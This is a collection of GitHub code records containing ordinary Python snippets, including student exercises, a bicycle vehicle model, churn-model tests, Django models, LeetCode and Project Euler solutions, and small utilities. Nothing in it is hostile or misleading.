input(\"What is the course? Choose from: {} \".format(courses_string))\n course = course.lower() #Convert to lower case to make case insensitive\n if (course in str(courses)):\n chooseCourse = 0\n else :\n print(\"{} is not an available course, please select another one\".format(course))\n chooseCourse = 1\n\n grade = input(\"What was his/her grade? \")\n\n #Allow the user to check wether it's input was coorect\n saveInputString = input(\"Is it true that {0} had an {1} for {2}? [Y/N]\".format(name, grade, course, format_spec='{2}'))\n saveInputString = saveInputString.lower() #Convert to lower case to make case insensitive\n if saveInputString == 'y':\n saveInput = True\n elif saveInputString == 'n':\n saveInput = False\n elif saveInputString == 'n':\n saveInput = False\n\n #Save input if desired\n if saveInput:\n for i in range(courses_amount):\n if course == courses[i]:\n grades[courses[i]][name] = grade\n students.append(name)\n\n #Display the grades which have been inserted in a nice way\n for courseName in grades:\n print(courseName)\n for student in grades[courseName]:\n print('-',student, ':', grades[courseName][student])\n\n #Ask the user if he/she want to continue and set flag acordingly\n continueInput = input(\"Do you want to continue? (Y/N)\")\n if continueInput == 'Y' or continueInput == 'y':\n continueFlag = 1\n else:\n continueFlag = 0","repo_name":"dtbinh/TI3105TU","sub_path":"week-2/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70759874811","text":"from profession import Profession\n\n\nclass Medical(Profession):\n\n def __init__(self, name: str):\n super().__init__(name, regulated_profession=True)\n self._med_level = \"None\"\n self.__work_in_hospital = None\n\n def change_med_level(self):\n \"\"\"\n Function changes med level from 3 options\n :return:\n \"\"\"\n user_level = input(\n \"Нажмите 1, если необходимо присвоить высший уровень, нажмите 2, если средний и 3 - если младший: \")\n if user_level == \"1\":\n self._med_level = \"high\"\n elif user_level == \"2\":\n self._med_level = \"middle\"\n else:\n self._med_level = \"low\"\n\n def show_med_level(self):\n \"\"\"\n Function shows current medical level\n \"\"\"\n return self._med_level\n\n\nif __name__ == '__main__':\n dentist = Medical(\"dentist\")\n dentist.change_med_level()\n print(dentist.show_med_level())\n","repo_name":"MariiaDo/basic-python","sub_path":"OOP_classes/medical.py","file_name":"medical.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34154959013","text":"import rldev\n\nimport numpy as np\n\nfrom .geo import State\n\n\n\nclass VehicleControl(object):\n def __init__(self, acc, steer):\n self.acc = acc\n self.steer = steer\n\n\n\nclass BicycleModel(object):\n def __init__(self, config, dt):\n self.min_velocity = config.min_velocity\n self.max_velocity = config.max_velocity\n self.max_acceleration = config.max_acceleration\n self.min_acceleration = config.min_acceleration\n self.max_steer = config.max_steer\n self.wheelbase = config.wheelbase\n self.max_curvature = np.tan(self.max_steer) / self.wheelbase\n self.dt = dt\n \n\n def __call__(self, *args, **kwargs):\n return self.forward(*args, **kwargs)\n\n\n def forward(self, state: State, action: VehicleControl):\n acc = np.clip(action.acc, self.min_acceleration, self.max_acceleration)\n steer = np.clip(action.steer, -self.max_steer, self.max_steer)\n\n x, y, theta, v = state.x, state.y, state.theta, state.v\n next_state = State(\n x=x + self.dt *v * np.cos(theta),\n y=y + self.dt *v * np.sin(theta),\n theta=rldev.pi2pi_numpy(theta + self.dt * v * np.tan(steer) / self.wheelbase),\n v=np.clip(v + self.dt *acc, self.min_velocity, self.max_velocity),\n )\n return next_state\n\n\n","repo_name":"alibaba-damo-academy/universe","sub_path":"universe/common/vehicle_model.py","file_name":"vehicle_model.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"13208959215","text":"\"\"\"\nScript Description: Test and monitor churn.library.py\nName: Zhahan Sun\nDate: Jun 3\n\"\"\"\nimport os\nimport logging\nimport churn_library as cl\nimport joblib\n\nlogging.basicConfig(\n filename='./logs/churn_library.log',\n level = logging.INFO,\n filemode='w',\n format='%(name)s - %(levelname)s - %(message)s')\n\ndef test_import(import_data):\n\t'''\n\ttest data import \n\t'''\n\ttry:\n\t\tdf = import_data(\"./data/bank_data.csv\")\n\t\tlogging.info(\"Testing import_data: SUCCESS\")\n\texcept FileNotFoundError as err:\n\t\tlogging.error(\"Testing import_eda: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert df.shape[0] > 0\n\t\tassert df.shape[1] > 0\n\texcept AssertionError as err:\n\t\tlogging.error(\"Testing import_data: The file doesn't appear to have rows and columns\")\n\t\traise err\n\n\n\ndef test_eda(import_data, perform_eda):\n\t'''\n\ttest perform eda function\n\t'''\n\n\tdf = import_data(\"./data/bank_data.csv\")\n\tperform_eda(df)\n\tpth_churn = './images/eda/churn_distribution.png'\n\tpth_age = './images/eda/customer_age_distribution.png'\n\tpth_heatmap = './images/eda/heatmap.png'\n\tpth_marital = './images/eda/marital_status_distribution.png'\n\tpth_transaction = './images/eda/total_transaction_distribution.png'\n\n\ttry:\n\t\tassert os.path.exists(pth_churn) == True and os.path.getsize(pth_churn) > 0\n\t\tlogging.info(\"Check churn_distribution.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check churn_distribution.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_age) == True and os.path.getsize(pth_age) > 0\n\t\tlogging.info(\"Check customer_age_distribution.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check customer_age_distribution.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_heatmap) == True and os.path.getsize(pth_heatmap) > 0\n\t\tlogging.info(\"Check heatmap.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check heatmap.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_marital) == True and os.path.getsize(pth_marital) > 0\n\t\tlogging.info(\"Check marital_status_distribution.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check marital_status_distribution.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_transaction) == True and os.path.getsize(pth_transaction) > 0\n\t\tlogging.info(\"Check total_transaction_distribution.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check total_transaction_distribution.png: The file wasn't found\")\n\t\traise err\n\n\ndef test_encoder_helper(import_data, encoder_helper):\n\t'''\n\ttest encoder helper\n\t'''\n\tdf = import_data(\"./data/bank_data.csv\")\n\tcategories = ['Gender', 'Education_Level', 'Marital_Status', 'Income_Category', 'Card_Category']\n\tresponseName = 'Churn'\n\tencoded_df = encoder_helper(df, categories, responseName)\n\n\ttry:\n\t\tassert encoded_df.shape[0] > 0\n\t\tassert encoded_df.shape[1] > 0\n\t\tlogging.info('encoded df dimension correct.')\n\texcept AssertionError as err:\n\t\tlogging.error(\"Testing test_encoder_helper: The file doesn't appear to have rows and columns\")\n\t\traise err\n\ndef test_perform_feature_engineering(import_data, encoder_helper, \n\t perform_feature_engineering):\n\t'''\n\ttest perform_feature_engineering\n\t'''\n\tdf = import_data(\"./data/bank_data.csv\")\n\tcategories = ['Gender', 'Education_Level', 'Marital_Status', 'Income_Category', 'Card_Category']\n\tresponseName = 'Churn'\n\n\tdf = encoder_helper(df, categories, responseName)\n\tmp = perform_feature_engineering(df, responseName)\n\ttry:\n\t\tassert mp['X_train'].shape[0] > 0\n\t\tassert mp['X_train'].shape[1] > 0\n\t\tassert mp['X_test'].shape[0] > 0\n\t\tassert mp['X_test'].shape[1] > 0\n\t\tassert mp['y_train'].size > 0\n\t\tassert mp['y_test'].size > 0\n\t\tlogging.info(\"Testing perform_feature_engineering: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Testing perform_feature_engineering: failed\")\n\t\traise err\n\n\ndef test_train_models(import_data, encoder_helper,\n perform_feature_engineering,\n classification_report_image,\n feature_importance_plot,\n\t train_models):\n\t'''\n\ttest train_models\n\t'''\n\tdf = import_data(\"./data/bank_data.csv\")\n\tcategories = ['Gender', 'Education_Level', 'Marital_Status', 'Income_Category', 'Card_Category']\n\tresponseName = 'Churn'\n\n\tdf = encoder_helper(df, categories, responseName)\n\tmp = perform_feature_engineering(df, responseName)\n \n\tX_train, X_test, y_train, y_test = mp['X_train'], mp['X_test'], mp['y_train'], mp['y_test']\n\ttrain_models(X_train, X_test, y_train, y_test)\n\trfc_model = joblib.load('./models/rfc_model.pkl')\n\tlr_model = joblib.load('./models/logistic_model.pkl')\n\ty_train_preds_rf = rfc_model.predict(X_train)\n\ty_test_preds_rf = rfc_model.predict(X_test)\n\ty_train_preds_lr = lr_model.predict(X_train)\n\ty_test_preds_lr = lr_model.predict(X_test)\n\n\tclassification_report_image(y_train,y_test,y_train_preds_lr,y_train_preds_rf,y_test_preds_lr,y_test_preds_rf)\n\tpth_feat = './images/results/feature_importances.png'\n\tfeature_importance_plot(rfc_model, mp['X'], pth_feat)\n\n\tpth_rf_res = './images/results/rf_results.png'\n\tpth_logistic_res = './images/results/logistic_results.png'\n\tpth_roc_auc = './images/results/roc_curve_result.png'\n\ttry:\n\t\tassert os.path.exists(pth_feat) == True and os.path.getsize(pth_feat) > 0\n\t\tlogging.info(\"Check feature_importance.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check feature_importance.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_rf_res) == True and os.path.getsize(pth_rf_res) > 0\n\t\tlogging.info(\"Check rf_results.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check rf_results.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_logistic_res) == True and os.path.getsize(pth_logistic_res) > 0\n\t\tlogging.info(\"Check logistic_results.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check logistic_results.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_roc_auc) == True and os.path.getsize(pth_roc_auc) > 0\n\t\tlogging.info(\"Check roc_auc_result.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check roc_auc_result.png: The file wasn't found\")\n\t\traise err\n\n\n\nif __name__ == \"__main__\":\n\ttest_import(cl.import_data)\n\ttest_eda(cl.import_data, cl.perform_eda)\n\ttest_encoder_helper(cl.import_data, cl.encoder_helper)\n\ttest_perform_feature_engineering(cl.import_data, cl.encoder_helper, cl.perform_feature_engineering)\n\ttest_train_models(cl.import_data, cl.encoder_helper,\n cl.perform_feature_engineering,\n cl.classification_report_image,\n cl.feature_importance_plot,\n\t cl.train_models)\n\n\n\n\n\n\n\n\n\n","repo_name":"zsun316/Predict-Customer-Churn","sub_path":"churn_script_logging_and_tests.py","file_name":"churn_script_logging_and_tests.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18836563022","text":"class Nodo_dron:\n def __init__(self, nombre = None, tipo = None, capacidad = None, siguiente = None):\n self.nombre = nombre\n self.tipo = tipo\n self.capacidad = capacidad\n self.siguiente = siguiente\n\nclass Nuevo_nodo_dron:\n def __init__(self):\n self.raiz = Nodo_dron()\n self.ultimo = Nodo_dron()\n\n def insertar(self, nuevoNodo):\n if self.raiz.nombre == None:\n self.raiz = nuevoNodo\n self.ultimo = nuevoNodo\n\n elif self.raiz.siguiente == None:\n self.raiz.siguiente = nuevoNodo\n self.ultimo = nuevoNodo\n else:\n self.ultimo.siguiente = nuevoNodo\n self.ultimo = nuevoNodo\n\n def imprimir(self, variable):\n aux = self.raiz\n\n while aux != None:\n if variable != \"ChapinRescue\":\n if aux.tipo != \"ChapinRescue\":\n print(\"Nombre:\",aux.nombre,\" Tipo:\",aux.tipo,\" Capacidad:\",aux.capacidad) \n aux = aux.siguiente\n else:\n aux = aux.siguiente\n\n else:\n if aux.tipo == \"ChapinRescue\":\n print(\"Nombre:\",aux.nombre,\" Tipo:\",aux.tipo) \n aux = aux.siguiente\n\n else:\n aux = aux.siguiente\n\n\n def buscar(self, nombre):\n try:\n aux = self.raiz\n while aux != None:\n if aux.nombre == nombre:\n return aux\n aux = aux.siguiente\n return False\n except:\n return False\n\n def editar(self, nombre, tipo, capacidad):\n aux = self.raiz\n while aux != None:\n if aux.nombre == nombre:\n aux.tipo = tipo\n aux.capacidad = capacidad \n return True\n aux = aux.siguiente\n return False\n def verificar(self):\n try:\n aux = self.raiz\n while aux != None:\n if aux.tipo== \"ChapinRescue\":\n return True\n aux = aux.siguiente\n return False\n except:\n return False\n\n def verificar_tipo(self):\n try:\n aux = self.raiz\n while aux != None:\n if aux.tipo == \"ChapinFighter\":\n return True\n aux = aux.siguiente\n return False\n except:\n return False","repo_name":"JavierGD15/IPC2_Proyecto2_-202000510","sub_path":"robots.py","file_name":"robots.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2812978086","text":"'''Setter Decorator - @name.setter\nGenerally, getter and setter are used simultaneously.\n@property - for an attribute.\n@NAME.setter - uses the same function for which @property was used, to set its value as constant'''\n\n\n# This will show why we need to use property decorator and setter decorator.\nclass Employee:\n name = \"Bharat Gas\"\n salary = 5600\n salaryBonus = 500\n salaryTotal = salary + salaryBonus\n \ne1= Employee()\nprint(e1.salary) # 5600\nprint(e1.salaryTotal) # 6100\nEmployee.salaryBonus = 400\ne2= Employee() \nprint(e2.salaryBonus) # 400\nprint(e2.salaryTotal) # 6100\n\n# NOTE - So from the above example it's clear that salaryTotal is computed only once as it is a class variable and although salaryBonus which is a class variable is changed using Employee.salaryBonus = 400, then also it's not changed.\n# NOTE - So, we can't have variables which are dynamic as class variable or instance variable in constructor but we can have them as instance variable in some class method/function or if we want it to be a property/attribute than we can use property decorator.\n\n# Example for setter.\nclass Employee:\n name = \"Bharat Gas\"\n salary = 5600\n salaryBonus = 500\n # salaryTotal = 6100 #We don't want it to be permanent.\n \n def ChangeSalaryBonus(self, bonus):\n self.__class__.salaryBonus = bonus\n print(self.salaryBonus)\n \n @property #Makes totalSalary an attribute.\n def totalSalary(self):\n return self.salary + self.salaryBonus\n # Here, it is GETTING the value of totalSalary on the basis of salary and bonus. \n \n @totalSalary.setter #Used on same function, Uses totalSalary as an attribute whose value is fixed(set).\n def totalSalary(self, val): # val contains the value of totalSalary.\n self.salaryBonus = val - self.salary\n \ne = Employee()\nprint(e.salary) \nprint(e.salaryBonus)\nprint(e.totalSalary)\ne.ChangeSalaryBonus(400)\nprint(e.totalSalary)\ne.totalSalary = 5800\nprint(e.totalSalary)\nprint(e.salary)\nprint(e.salaryBonus)\n\n'''OUTPUT'''\n# 5600\n# 500\n# 6100\n# 400\n# 6000\n# 5800\n# 5600\n# 200","repo_name":"MayankGupta-dev08/My-Python-work","sub_path":"85_setter Decorator.py","file_name":"85_setter Decorator.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"41213922452","text":"class MyCalendarThree:\n\n def __init__(self):\n self.array=[]\n \n \n\n def book(self, start: int, end: int) -> int:\n i=bisect.bisect_left(self.array,(start,1))\n self.array.insert(i,(start,1))\n j=bisect.bisect_left(self.array,(start,1))\n self.array.insert(j,(end,-1))\n self.array.sort()\n maxi=0\n count=0\n for pair in self.array:\n count+=pair[1]\n maxi=max(maxi,count)\n return maxi\n \n \n \n\n\n# Your MyCalendarThree object will be instantiated and called as such:\n# obj = MyCalendarThree()\n# param_1 = obj.book(start,end)","repo_name":"jaswanthKumarchapiri2000/coding","sub_path":"0732-my-calendar-iii/0732-my-calendar-iii.py","file_name":"0732-my-calendar-iii.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41563592793","text":"import uuid\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass BaseUserData(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n\n firstname = models.CharField(_(\"first name\"), max_length=30, blank=True, default=\"\")\n lastname = models.CharField(_(\"last name\"), max_length=150, blank=True, default=\"\")\n\n phone = models.CharField(max_length=255, verbose_name=_(\"Phone\"))\n email = models.EmailField(max_length=255, verbose_name=_(\"Email\"))\n address = models.CharField(max_length=255, verbose_name=_(\"Address\"))\n gender = models.CharField(_(\"Gender\"), max_length=255, default=\"male\")\n\n avatar = models.ImageField(\n upload_to=\"avatars/\", verbose_name=_(\"Avatar\"), blank=True\n )\n\n class Meta:\n abstract = True\n\n\nclass Teacher(BaseUserData, models.Model):\n students = models.ManyToManyField(\"Student\", related_name=\"teachers\", blank=True)\n\n def __str__(self):\n return f\"{self.firstname} {self.lastname}\"\n\n\nclass Parent(BaseUserData, models.Model):\n def __str__(self):\n return f\"{self.firstname} {self.lastname}\"\n\n\nclass Class(models.Model):\n name = models.CharField(max_length=255, verbose_name=_(\"Name\"))\n description = models.TextField(verbose_name=_(\"Description\"))\n teacher = models.ForeignKey(\n Teacher, on_delete=models.CASCADE, related_name=\"classes\"\n )\n students = models.ManyToManyField(\"Student\", related_name=\"classes\", blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass Student(BaseUserData, models.Model):\n parent = models.ForeignKey(\n \"Parent\", related_name=\"students\", blank=True, on_delete=models.CASCADE\n )\n\n def __str__(self):\n return f\"{self.firstname} {self.lastname}\"\n\n\nclass User(BaseUserData, AbstractUser):\n \"\"\"\n Default custom user model for Coachify.\n If adding fields that need to be filled at user signup,\n check forms.SignupForm and forms.SocialSignupForms accordingly.\n \"\"\"\n\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n\n email = models.EmailField(\n _(\"email address\"),\n unique=True,\n error_messages={\n \"unique\": _(\"A user with that email already exists.\"),\n },\n )\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = [\"username\"]\n teachers = models.ManyToManyField(Teacher, related_name=\"principal\", blank=True)\n\n def get_absolute_url(self):\n \"\"\"Get url for user's detail view.\n\n Returns:\n str: URL for user detail.\n\n \"\"\"\n return reverse(\"users:detail\", kwargs={\"username\": self.username})\n","repo_name":"Manjit2003/coachify-backend","sub_path":"coachify/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19208000778","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n def backtracking(inset: List[int], nums: List[int]) -> None:\n for i, n in enumerate(nums):\n nums[0], nums[i] = nums[i], nums[0]\n if inset and n > inset[-1] or not inset:\n answer.append(inset + [n])\n backtracking(inset + [n], nums[1:])\n \n answer = [[],]\n backtracking([], nums)\n return answer\n \n","repo_name":"michaelhuo/pcp","sub_path":"78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31505811974","text":"from pathlib import Path\nimport imageio\nimport argparse\n\n\nclass GIFGenerator:\n def __init__(self, img_folder, out_gif):\n self.img_folder = Path(img_folder)\n self.out_gif = out_gif\n\n def act(self, var_dict=None):\n files = sorted(self.img_folder.glob('*.png'))\n images = []\n for file in files:\n images.append(imageio.imread(file))\n imageio.mimsave(self.out_gif, images)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('img_folder', type=str)\n parser.add_argument('out_gif', type=str)\n args = parser.parse_args()\n\n GIFGenerator(args.img_folder, args.out_gif).act()\n","repo_name":"lingxiaoli94/POL","sub_path":"pol/utils/validation/gif_generator.py","file_name":"gif_generator.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"34069061802","text":"# # question17 of doc--he/she can vote or not.\n# def vote():\n# age=int(input(\"please enter age:\"))\n# if age>=18:\n# print(\"eligible for voting.\")\n# else:\n# print(\"not eligible.\")\n# vote()\n\ndef func(x=1, y=2):\n x=x+y\n y+=1\n print(x,y)\nfunc(y=2, x=1)","repo_name":"kirtigullaiya/Function","sub_path":"ready to vote or not.py","file_name":"ready to vote or not.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38076201471","text":"import boto3\nfrom datetime import datetime as dt\nimport pandas as pd\n\nSEPERATOR = '/'\n\n\nclass TableNotFoundError (Exception):\n pass\n\n\nclass EmptyBucketError (Exception):\n pass\n\n\nclass BucketNotFoundError (Exception):\n pass\n\n\ndef get_ingestion_bucket_name():\n '''\n Returns:\n The timestamped ingestion bucket name containing our raw CSV\n '''\n ingestion_bucket_name = 'terrific-totes-ingestion-bucket'\n ingestion_bucket_ts = get_timestamped_bucket_name(ingestion_bucket_name)\n return ingestion_bucket_ts\n\n\ndef get_parquet_bucket_name():\n '''\n Returns:\n The timestamped name of the bucket containing our parquet data\n '''\n processed_bucket_name = 'terrific-totes-processed-bucket'\n processed_bucket_ts = get_timestamped_bucket_name(processed_bucket_name)\n return processed_bucket_ts\n\n\ndef get_tables():\n ''' Used to collect a sorted list of tables, with the newest\n entries first.\n\n Args:\n get_ingestion_bucket_name - A function which returns the name of\n the ingestion bucket.\n\n Returns:\n tables: A list of table names - sorted by timestamp.\n '''\n\n bucket_name = get_ingestion_bucket_name()\n s3 = boto3.client('s3')\n\n try:\n list_tables_response = s3.list_objects(\n Bucket=bucket_name\n )\n except s3.exceptions.NoSuchBucket:\n raise BucketNotFoundError(bucket_name)\n\n # The bucket is empty because it has no contents\n if 'Contents' not in list_tables_response:\n raise EmptyBucketError(list_tables_response['Name'])\n\n # The names of the table\n tables = [table['Key'] for table in list_tables_response['Contents']]\n\n def get_key_timestamp(key):\n split = key.split(SEPERATOR)\n timestamp_str = split[0]\n return dt.fromisoformat(timestamp_str).timestamp()\n\n \"\"\"\n Note: Reverse ordering is set to true as this puts the\n most recent tables first.\n \"\"\"\n tables.sort(key=get_key_timestamp, reverse=True)\n return tables\n\n\ndef get_most_recent_table(table_name):\n '''\n Used to get the S3 name most recently updated version of a table,\n if for example we have 4 versions of staff.csv, this\n will return the newest one.\n\n Args:\n table_name - The name of the CSV file\n\n Returns:\n The most recent table name\n\n Throws:\n TableNotFoundError - when the table does not exist\n '''\n\n try:\n tables = get_tables()\n except EmptyBucketError:\n raise TableNotFoundError(table_name)\n\n for table in tables:\n if table.endswith(table_name):\n return table\n\n raise TableNotFoundError(table_name)\n\n\ndef read_table(table_name):\n '''\n Will return the contents of the most recent table\n packaged in a dictionary\n\n Args:\n table_name - the name of the table\n\n Returns\n A dictionary of form:\n - name: The name of the table (timestamped)\n - body: The CSV contents of the table as a string\n '''\n s3_client = boto3.client('s3')\n ingestion_bucket = get_ingestion_bucket_name()\n key = get_most_recent_table(table_name)\n\n response = s3_client.get_object(\n Bucket=ingestion_bucket,\n Key=key\n )\n\n dataframe = pd.read_csv(response['Body'])\n timestamp = dt.fromisoformat(key.split(SEPERATOR)[0])\n\n return {\n 'Name': table_name,\n 'Timestamp': timestamp,\n 'Key': key,\n 'Body': dataframe\n }\n\n\ndef get_timestamped_bucket_name(bucket_name):\n '''\n As our bucket names are time-stamped, we use this to find\n the correct bucket without specifying exactly when it was created.\n\n Args:\n bucket_name - the non-timestamped name of the bucket:\n example: terrific-totes-ingestion-bucket\n\n Returns:\n The timestamped bucket name, for example:\n terrific-totes-ingestion-bucket20230725102602583400000001\n\n Throws:\n BucketNotFoundError - when the bucket does not exist\n '''\n\n for bucket in boto3.client(\"s3\").list_buckets().get(\"Buckets\"):\n if bucket[\"Name\"].startswith(bucket_name):\n return bucket[\"Name\"]\n\n # The bucket does not exist.\n raise BucketNotFoundError(bucket_name)\n","repo_name":"robbfox/totesys","sub_path":"src/lambda_transformation/utils/get_tables.py","file_name":"get_tables.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70017601852","text":"from reportlab.lib.pagesizes import letter\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.utils import ImageReader\nfrom reportlab.pdfgen.canvas import Canvas\nimport calcsum\ndef create_pdf_with_image_and_sum(image_path, pdf_path, image_size, amount,amout_wats):\n c = Canvas(pdf_path, pagesize=letter)\n\n img = ImageReader(image_path)\n\n img_width, img_height = img.getSize()\n aspect_ratio = img_height / float(img_width)\n img_width = image_size * inch\n img_height = img_width * aspect_ratio\n x = 0.5 * (letter[0] - img_width)\n y = 0.5 * (letter[1] - img_height)\n\n c.drawImage(image_path, x, y + inch + 0.5 * inch, img_width, img_height)\n\n c.setFont('Helvetica', 20)\n c.drawCentredString(letter[0] / 2.0, letter[1] - inch, \"Document for the payment period\")\n\n c.setFont('Helvetica', 18)\n c.drawString(inch, inch * 4, f'Total powur usage for month: {round(amount,2)} W/h')\n c.drawString(inch, inch * 4.5, f'Total cost for month: {round(amout_wats,2)} Rub')\n\n c.setFont('Helvetica', 20)\n c.drawCentredString(letter[0] / 2.0 , letter[1] - 2.5 * inch + 0.5 * inch, f'Grapg of usage')\n\n c.showPage()\n c.save()","repo_name":"Qyeler/NTO_BattleStar","sub_path":"doPdf.py","file_name":"doPdf.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22348043231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: sivnerof\n\nSee PDF in containing folder for problem set requirements\n\"\"\"\n\n\nannual_salary = float(input('Annual Salary: '))\nportion_saved = float(input('Percentage To Be Saved As Decimal: '))\ntotal_cost = float(input('Cost of your dream home: '))\nsemi_annual_raise = float(input('Semi annual raise, as decimal: '))\n\nportion_down_payment = 0.25\ncurrent_savings = 0\nreturn_on_investment = 0.04\n\ngoal = portion_down_payment * total_cost\nmonth = 0\n\n\nwhile current_savings < goal:\n month += 1\n if month % 6 == 0:\n annual_salary += annual_salary * semi_annual_raise \n current_savings += portion_saved * (annual_salary / 12) + current_savings * return_on_investment / 12\n\nprint(f'{month} months')","repo_name":"Sivnerof/6.00.1x","sub_path":"Problem-Set_1/ps1b.py","file_name":"ps1b.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"606906403","text":"# The prime factors of 13195 are 5, 7, 13 and 29.\n# What is the largest prime factor of the number 600851475143 ?\n\n# 1. should know prime numbers first\n# 2. prime list limit should be smaller than root of 600851475143\n# 3. find ou root of 600851475143\n# 4. find out prime list\n# 5. try to divide 600851475143 by arguments in prime list\n# 6. the largest one is the largest prime factor of the number 600851475143\n\n\nlimit = int(600851475143 ** 0.5) + 1 #less than 775146\nprime_list = []\nprime_factor = 0\nfor i in range(2, limit):\n limit_i = int(i ** 0.5) + 1\n for j in range(2, limit_i):\n if i % j == 0:\n prime_factor += 1\n if prime_factor == 0:\n prime_list.append(i)\n prime_factor = 0\nprime_factors = []\nfor k in prime_list:\n if 600851475143 % k == 0:\n prime_factors.append(k)\nprint(prime_factors) #[71, 839, 1471, 6857]\n\n# the largest prime factor of the number 600851475143 = 6857\n# but this solution takes a lot of time (over 30secs)\n# how about find factors of 600851475143 limit by 1000 and figure out factors are prime then divide 600851475143 by prime factor first?\n\n# 1. try to divide qValue from 2 to 1000\n# 2. If there are numbers, check these are prime numbers\n# 3. then divide qValue by these numbers. then I can make qValue smaller\nqValue = 600851475143\n\nfactors_upto1000 = []\nfor i in range(2, 1000):\n if qValue % i == 0:\n factors_upto1000.append(i)\nprint(factors_upto1000) #[71, 839]\n\n# 4. check 71, 839 isPrime\n\ndef isPrimeNumber(x):\n for i in range(2, int(x**0.5)+1):\n if x % i == 0:\n return False\n return True\n\n# print(isPrimeNumber(71)) #True\n# print(isPrimeNumber(839)) #True\n\n# 5. divide qValue by 71 and 839, I can find 1471 and 6857\n# 6. 1471 and 6857 is prime number. and qValue == 71 * 839 * 1471 * 6857\n\nqValue_divided = ((qValue / 71) / 839) / 1471 #1471 is Prime factor\nprint(qValue_divided) #final qValue_divided is 6857\nprint(isPrimeNumber(6857)) # True\n\nlimit = int(qValue_divided ** 0.5) + 1\nprime_list = []\nprime_factor = 0\nfor i in range(2, limit):\n limit_i = int(i ** 0.5) + 1\n for j in range(2, limit_i):\n if i % j == 0:\n prime_factor += 1\n if prime_factor == 0:\n prime_list.append(i)\n prime_factor = 0\nprime_factors = []\nfor k in prime_list:\n if qValue_divided % k == 0:\n prime_factors.append(k)\nprint(prime_factors)","repo_name":"Maximume/python_study","sub_path":"Project_Euler/001_010/003_largest prime factor.py","file_name":"003_largest prime factor.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"6914065939","text":"from fast_map import fast_map\nimport time\n\n# this function is called from different processes/threads.\n# Meaning that using threading.Lock objects inside it may\n# lead to a deadlock if the default process creating method\n# happens to be \"fork\" (instead of \"spawn\" or \"forkserver\")\ndef io_and_cpu_expensive_function(x):\n time.sleep(1)\n for i in range(10 ** 4):\n pass\n return x*x\n\nprint('Unlimited threads (threads_count = number of tasks)')\n# 8 threads in total will be used.\n# On 4 core CPU, 2 threads will be spawned in each process.\nfor i in fast_map(io_and_cpu_expensive_function, range(8), threads_limit=None):\n 